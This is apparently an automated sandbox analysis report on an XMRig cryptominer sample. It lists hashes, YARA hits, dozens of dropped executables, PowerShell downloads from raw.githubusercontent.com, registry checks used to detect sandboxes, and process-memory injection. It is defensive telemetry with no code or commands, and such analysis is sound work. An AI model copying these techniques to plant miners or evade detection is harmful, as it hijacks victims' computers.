xmrig | fbb6877b5379b09127435f11b3c9f0846652dbb72ec7d03ed2fbf8f01e1ad686

Analysis

max time kernel
118s
max time network
140s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
14/05/2024, 21:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
Size

1.3MB
MD5

315553a3386ad6ff7ce8263dc92d7430
SHA1

26b6255fab15f2d73499d32271b29b3b7a9564ba
SHA256

fbb6877b5379b09127435f11b3c9f0846652dbb72ec7d03ed2fbf8f01e1ad686
SHA512

784d211381f40865f1c9d62188b2e4826751fa33512f7756b9073e3eca456e4f54796f10111828310de9f95d7ccddd6f5f6d36c312a4a2f0eab2d344c37a97e0
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkUCCWvLEvjhnXwx8/2Pbx/mbGRZcFuA:Lz071uv4BPMkHC0IlnASEx/R2uA

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 46 IoCs

miner

resource	yara_rule
behavioral2/memory/2232-364-0x00007FF6818D0000-0x00007FF681CC2000-memory.dmp	xmrig
behavioral2/memory/1796-375-0x00007FF7F31B0000-0x00007FF7F35A2000-memory.dmp	xmrig
behavioral2/memory/1616-386-0x00007FF6613D0000-0x00007FF6617C2000-memory.dmp	xmrig
behavioral2/memory/1104-407-0x00007FF64D210000-0x00007FF64D602000-memory.dmp	xmrig
behavioral2/memory/5020-427-0x00007FF6C33E0000-0x00007FF6C37D2000-memory.dmp	xmrig
behavioral2/memory/644-433-0x00007FF7CC880000-0x00007FF7CCC72000-memory.dmp	xmrig
behavioral2/memory/1188-452-0x00007FF701600000-0x00007FF7019F2000-memory.dmp	xmrig
behavioral2/memory/2316-466-0x00007FF68B040000-0x00007FF68B432000-memory.dmp	xmrig
behavioral2/memory/5012-471-0x00007FF7DDDF0000-0x00007FF7DE1E2000-memory.dmp	xmrig
behavioral2/memory/4340-474-0x00007FF6D1B50000-0x00007FF6D1F42000-memory.dmp	xmrig
behavioral2/memory/2096-477-0x00007FF783F50000-0x00007FF784342000-memory.dmp	xmrig
behavioral2/memory/1564-462-0x00007FF6B5CD0000-0x00007FF6B60C2000-memory.dmp	xmrig
behavioral2/memory/5056-456-0x00007FF787280000-0x00007FF787672000-memory.dmp	xmrig
behavioral2/memory/3412-451-0x00007FF7A3A60000-0x00007FF7A3E52000-memory.dmp	xmrig
behavioral2/memory/3320-448-0x00007FF636230000-0x00007FF636622000-memory.dmp	xmrig
behavioral2/memory/2308-436-0x00007FF7FB1B0000-0x00007FF7FB5A2000-memory.dmp	xmrig
behavioral2/memory/2436-428-0x00007FF74FED0000-0x00007FF7502C2000-memory.dmp	xmrig
behavioral2/memory/3620-419-0x00007FF654D50000-0x00007FF655142000-memory.dmp	xmrig
behavioral2/memory/928-394-0x00007FF639390000-0x00007FF639782000-memory.dmp	xmrig
behavioral2/memory/2448-400-0x00007FF787970000-0x00007FF787D62000-memory.dmp	xmrig
behavioral2/memory/2932-363-0x00007FF7C2270000-0x00007FF7C2662000-memory.dmp	xmrig
behavioral2/memory/2880-358-0x00007FF72EBD0000-0x00007FF72EFC2000-memory.dmp	xmrig
behavioral2/memory/4736-354-0x00007FF7A7780000-0x00007FF7A7B72000-memory.dmp	xmrig
behavioral2/memory/3844-2258-0x00007FF76D170000-0x00007FF76D562000-memory.dmp	xmrig
behavioral2/memory/3844-2261-0x00007FF76D170000-0x00007FF76D562000-memory.dmp	xmrig
behavioral2/memory/2932-2295-0x00007FF7C2270000-0x00007FF7C2662000-memory.dmp	xmrig
behavioral2/memory/2880-2297-0x00007FF72EBD0000-0x00007FF72EFC2000-memory.dmp	xmrig
behavioral2/memory/4340-2309-0x00007FF6D1B50000-0x00007FF6D1F42000-memory.dmp	xmrig
behavioral2/memory/1796-2322-0x00007FF7F31B0000-0x00007FF7F35A2000-memory.dmp	xmrig
behavioral2/memory/2448-2328-0x00007FF787970000-0x00007FF787D62000-memory.dmp	xmrig
behavioral2/memory/3620-2332-0x00007FF654D50000-0x00007FF655142000-memory.dmp	xmrig
behavioral2/memory/5020-2336-0x00007FF6C33E0000-0x00007FF6C37D2000-memory.dmp	xmrig
behavioral2/memory/644-2338-0x00007FF7CC880000-0x00007FF7CCC72000-memory.dmp	xmrig
behavioral2/memory/2436-2334-0x00007FF74FED0000-0x00007FF7502C2000-memory.dmp	xmrig
behavioral2/memory/1104-2330-0x00007FF64D210000-0x00007FF64D602000-memory.dmp	xmrig
behavioral2/memory/1616-2326-0x00007FF6613D0000-0x00007FF6617C2000-memory.dmp	xmrig
behavioral2/memory/928-2324-0x00007FF639390000-0x00007FF639782000-memory.dmp	xmrig
behavioral2/memory/2232-2311-0x00007FF6818D0000-0x00007FF681CC2000-memory.dmp	xmrig
behavioral2/memory/4736-2291-0x00007FF7A7780000-0x00007FF7A7B72000-memory.dmp	xmrig
behavioral2/memory/3412-2353-0x00007FF7A3A60000-0x00007FF7A3E52000-memory.dmp	xmrig
behavioral2/memory/2308-2359-0x00007FF7FB1B0000-0x00007FF7FB5A2000-memory.dmp	xmrig
behavioral2/memory/3320-2355-0x00007FF636230000-0x00007FF636622000-memory.dmp	xmrig
behavioral2/memory/1188-2350-0x00007FF701600000-0x00007FF7019F2000-memory.dmp	xmrig
behavioral2/memory/5056-2349-0x00007FF787280000-0x00007FF787672000-memory.dmp	xmrig
behavioral2/memory/1564-2346-0x00007FF6B5CD0000-0x00007FF6B60C2000-memory.dmp	xmrig
behavioral2/memory/2316-2345-0x00007FF68B040000-0x00007FF68B432000-memory.dmp	xmrig

Blocklisted process makes network request 26 IoCs

flow	pid	Process
9	2820	powershell.exe
11	2820	powershell.exe
25	2820	powershell.exe
26	2820	powershell.exe
27	2820	powershell.exe
29	2820	powershell.exe
30	2820	powershell.exe
31	2820	powershell.exe
32	2820	powershell.exe
33	2820	powershell.exe
35	2820	powershell.exe
37	2820	powershell.exe
38	2820	powershell.exe
39	2820	powershell.exe
40	2820	powershell.exe
41	2820	powershell.exe
42	2820	powershell.exe
43	2820	powershell.exe
44	2820	powershell.exe
45	2820	powershell.exe
46	2820	powershell.exe
51	2820	powershell.exe
52	2820	powershell.exe
53	2820	powershell.exe
54	2820	powershell.exe
55	2820	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2820	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
3844	ZwCeRCo.exe
5012	lHoKhzI.exe
4340	ofgqRYi.exe
4736	VHrexKo.exe
2880	AsqNDeA.exe
2932	wzRTGpC.exe
2232	JkBrHnG.exe
2096	pJUWqvY.exe
1796	Cocumug.exe
1616	UgTbiCs.exe
928	YWChqwz.exe
2448	QDavlGU.exe
1104	SdSHPhg.exe
3620	iwsNFMw.exe
5020	WnlJqCo.exe
2436	MeVavpX.exe
644	gItkTfn.exe
2308	JizsrYz.exe
3320	EKSCdKC.exe
3412	pPNfzxI.exe
1188	srOXrVr.exe
5056	FKnymPf.exe
1564	bSffvpr.exe
2316	NuFRvzL.exe
3108	RXopuhZ.exe
3156	mqScaLQ.exe
4608	WsBHtRM.exe
4976	DpTEilI.exe
628	rVlVRzD.exe
5052	hjOXYBz.exe
1584	XpXTLXc.exe
1488	yADMCoL.exe
4524	AnxJfnB.exe
4612	rDPmvGJ.exe
4372	dyIseZV.exe
2180	RHPyiOa.exe
2860	MsTWLBN.exe
4348	efLvPGo.exe
5064	GklpqzW.exe
4328	mNvZcMS.exe
4336	YECmHiE.exe
716	ZZlMtni.exe
1124	uJhvJDe.exe
4356	WxkEXXd.exe
2964	DwOLavC.exe
5040	XmSaWSr.exe
4720	Kgdeyyt.exe
4808	iUMmTse.exe
2936	OEeUDCH.exe
5080	FzhhZBv.exe
2912	czeEzgh.exe
5024	lIEFrke.exe
2292	bUjMpmM.exe
728	ACcgBZQ.exe
4908	LXAHDLI.exe
412	jdvXMAY.exe
2728	cxgUOwF.exe
4388	ernjJJy.exe
3504	PTvHZtv.exe
2400	BikgeuY.exe
2712	aSENcYM.exe
1492	kWFEeKf.exe
376	vWOshAL.exe
4364	YgKvVTH.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2800-0-0x00007FF7CBDF0000-0x00007FF7CC1E2000-memory.dmp	upx
behavioral2/memory/3844-12-0x00007FF76D170000-0x00007FF76D562000-memory.dmp	upx
behavioral2/files/0x0007000000023467-17.dat	upx
behavioral2/files/0x0007000000023466-9.dat	upx
behavioral2/files/0x0008000000023462-6.dat	upx
behavioral2/files/0x000700000002346a-29.dat	upx
behavioral2/files/0x000700000002346b-47.dat	upx
behavioral2/files/0x0008000000023463-58.dat	upx
behavioral2/files/0x000700000002346c-62.dat	upx
behavioral2/files/0x000700000002346f-67.dat	upx
behavioral2/files/0x000800000002346e-79.dat	upx
behavioral2/files/0x0007000000023473-99.dat	upx
behavioral2/files/0x0007000000023477-111.dat	upx
behavioral2/files/0x0007000000023479-121.dat	upx
behavioral2/files/0x000700000002347c-144.dat	upx
behavioral2/files/0x000700000002347f-159.dat	upx
behavioral2/files/0x0007000000023483-171.dat	upx
behavioral2/memory/2232-364-0x00007FF6818D0000-0x00007FF681CC2000-memory.dmp	upx
behavioral2/memory/1796-375-0x00007FF7F31B0000-0x00007FF7F35A2000-memory.dmp	upx
behavioral2/memory/1616-386-0x00007FF6613D0000-0x00007FF6617C2000-memory.dmp	upx
behavioral2/memory/1104-407-0x00007FF64D210000-0x00007FF64D602000-memory.dmp	upx
behavioral2/memory/5020-427-0x00007FF6C33E0000-0x00007FF6C37D2000-memory.dmp	upx
behavioral2/memory/644-433-0x00007FF7CC880000-0x00007FF7CCC72000-memory.dmp	upx
behavioral2/memory/1188-452-0x00007FF701600000-0x00007FF7019F2000-memory.dmp	upx
behavioral2/memory/2316-466-0x00007FF68B040000-0x00007FF68B432000-memory.dmp	upx
behavioral2/memory/5012-471-0x00007FF7DDDF0000-0x00007FF7DE1E2000-memory.dmp	upx
behavioral2/memory/4340-474-0x00007FF6D1B50000-0x00007FF6D1F42000-memory.dmp	upx
behavioral2/memory/2096-477-0x00007FF783F50000-0x00007FF784342000-memory.dmp	upx
behavioral2/memory/1564-462-0x00007FF6B5CD0000-0x00007FF6B60C2000-memory.dmp	upx
behavioral2/memory/5056-456-0x00007FF787280000-0x00007FF787672000-memory.dmp	upx
behavioral2/memory/3412-451-0x00007FF7A3A60000-0x00007FF7A3E52000-memory.dmp	upx
behavioral2/memory/3320-448-0x00007FF636230000-0x00007FF636622000-memory.dmp	upx
behavioral2/memory/2308-436-0x00007FF7FB1B0000-0x00007FF7FB5A2000-memory.dmp	upx
behavioral2/memory/2436-428-0x00007FF74FED0000-0x00007FF7502C2000-memory.dmp	upx
behavioral2/memory/3620-419-0x00007FF654D50000-0x00007FF655142000-memory.dmp	upx
behavioral2/memory/928-394-0x00007FF639390000-0x00007FF639782000-memory.dmp	upx
behavioral2/memory/2448-400-0x00007FF787970000-0x00007FF787D62000-memory.dmp	upx
behavioral2/memory/2932-363-0x00007FF7C2270000-0x00007FF7C2662000-memory.dmp	upx
behavioral2/memory/2880-358-0x00007FF72EBD0000-0x00007FF72EFC2000-memory.dmp	upx
behavioral2/memory/4736-354-0x00007FF7A7780000-0x00007FF7A7B72000-memory.dmp	upx
behavioral2/files/0x0007000000023484-176.dat	upx
behavioral2/files/0x0007000000023482-174.dat	upx
behavioral2/files/0x0007000000023481-169.dat	upx
behavioral2/files/0x0007000000023480-164.dat	upx
behavioral2/files/0x000700000002347e-154.dat	upx
behavioral2/files/0x000700000002347d-149.dat	upx
behavioral2/files/0x000700000002347b-139.dat	upx
behavioral2/files/0x000700000002347a-134.dat	upx
behavioral2/files/0x0007000000023478-124.dat	upx
behavioral2/files/0x0007000000023476-114.dat	upx
behavioral2/files/0x0007000000023475-109.dat	upx
behavioral2/files/0x0007000000023474-104.dat	upx
behavioral2/files/0x0007000000023472-94.dat	upx
behavioral2/files/0x000800000002346d-89.dat	upx
behavioral2/files/0x0007000000023471-84.dat	upx
behavioral2/files/0x0007000000023470-72.dat	upx
behavioral2/files/0x0007000000023469-33.dat	upx
behavioral2/files/0x0007000000023468-21.dat	upx
behavioral2/memory/3844-2258-0x00007FF76D170000-0x00007FF76D562000-memory.dmp	upx
behavioral2/memory/3844-2261-0x00007FF76D170000-0x00007FF76D562000-memory.dmp	upx
behavioral2/memory/2932-2295-0x00007FF7C2270000-0x00007FF7C2662000-memory.dmp	upx
behavioral2/memory/2880-2297-0x00007FF72EBD0000-0x00007FF72EFC2000-memory.dmp	upx
behavioral2/memory/4340-2309-0x00007FF6D1B50000-0x00007FF6D1F42000-memory.dmp	upx
behavioral2/memory/1796-2322-0x00007FF7F31B0000-0x00007FF7F35A2000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\skLyGGO.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\YmngVNd.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\DoCJcRd.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\xrXkGnN.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\daKnNKz.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\ddyGBLI.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\ELzkKbM.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\zKyhVbT.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\IVQHGUn.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\kpjZPax.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\IOZjNWQ.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\BdZrNll.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\lQkkJYl.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\qgmovjW.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\yxBSasT.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\BcosggK.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\jZDGwsQ.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\mAbKgvJ.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\psTwllR.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\hLGUgxp.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\kZrcebN.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\DwOLavC.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\YeJzvmx.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\fzfmJai.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\GWnNpQw.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\leYuHJl.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\LSgmwhU.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\HdNWGKK.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\CwVOOrD.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\yrRIegm.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\MduYfOP.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\AsqNDeA.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\xWEkCjK.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\MXVMshY.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\chHSkKe.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\OHGJbSI.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\ZQsVzFR.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\MgWwmzi.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\dnauJgU.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\xgtowvj.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\bJkuaSl.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\yvHRLnr.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\NvzkRnR.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\CAJZlon.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\ACcgBZQ.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\DqnbUrB.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\DtchZeL.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\FZXZjIr.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\BEhpiUX.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\WwDYIoA.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\wcWGaIN.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\avNOwYN.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\czeEzgh.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\McYMqaA.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\VGgNiQF.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\VHCrBgS.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\PvvHJfD.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\RrXlTKp.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\GISXknB.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\yEPejju.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\UfXFpFz.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\vNvjldo.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\DpTEilI.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
File created	C:\Windows\System\XZWZBKk.exe	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	dwm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	dwm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	dwm.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	dwm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	dwm.exe

Modifies data under HKEY_USERS 18 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	dwm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies	dwm.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2820	powershell.exe
2820	powershell.exe
2820	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeLockMemoryPrivilege	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe
Token: SeCreateGlobalPrivilege	7292	dwm.exe
Token: SeChangeNotifyPrivilege	7292	dwm.exe
Token: 33	7292	dwm.exe
Token: SeIncBasePriorityPrivilege	7292	dwm.exe
Token: SeShutdownPrivilege	7292	dwm.exe
Token: SeCreatePagefilePrivilege	7292	dwm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2800 wrote to memory of 2820	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	84
PID 2800 wrote to memory of 2820	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	84
PID 2800 wrote to memory of 3844	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	85
PID 2800 wrote to memory of 3844	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	85
PID 2800 wrote to memory of 5012	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	86
PID 2800 wrote to memory of 5012	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	86
PID 2800 wrote to memory of 4340	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	87
PID 2800 wrote to memory of 4340	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	87
PID 2800 wrote to memory of 4736	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	88
PID 2800 wrote to memory of 4736	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	88
PID 2800 wrote to memory of 2880	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	89
PID 2800 wrote to memory of 2880	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	89
PID 2800 wrote to memory of 2932	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	90
PID 2800 wrote to memory of 2932	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	90
PID 2800 wrote to memory of 2232	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	91
PID 2800 wrote to memory of 2232	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	91
PID 2800 wrote to memory of 1796	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	92
PID 2800 wrote to memory of 1796	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	92
PID 2800 wrote to memory of 2096	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	93
PID 2800 wrote to memory of 2096	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	93
PID 2800 wrote to memory of 1616	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	94
PID 2800 wrote to memory of 1616	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	94
PID 2800 wrote to memory of 928	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	95
PID 2800 wrote to memory of 928	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	95
PID 2800 wrote to memory of 2448	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	96
PID 2800 wrote to memory of 2448	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	96
PID 2800 wrote to memory of 1104	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	97
PID 2800 wrote to memory of 1104	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	97
PID 2800 wrote to memory of 3620	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	98
PID 2800 wrote to memory of 3620	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	98
PID 2800 wrote to memory of 5020	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	99
PID 2800 wrote to memory of 5020	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	99
PID 2800 wrote to memory of 2436	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	100
PID 2800 wrote to memory of 2436	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	100
PID 2800 wrote to memory of 644	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	101
PID 2800 wrote to memory of 644	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	101
PID 2800 wrote to memory of 2308	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	102
PID 2800 wrote to memory of 2308	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	102
PID 2800 wrote to memory of 3320	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	103
PID 2800 wrote to memory of 3320	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	103
PID 2800 wrote to memory of 3412	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	104
PID 2800 wrote to memory of 3412	2800	315553a3386ad6ff7ce8263dc92d7430_NeikiAnalytics.exe	104
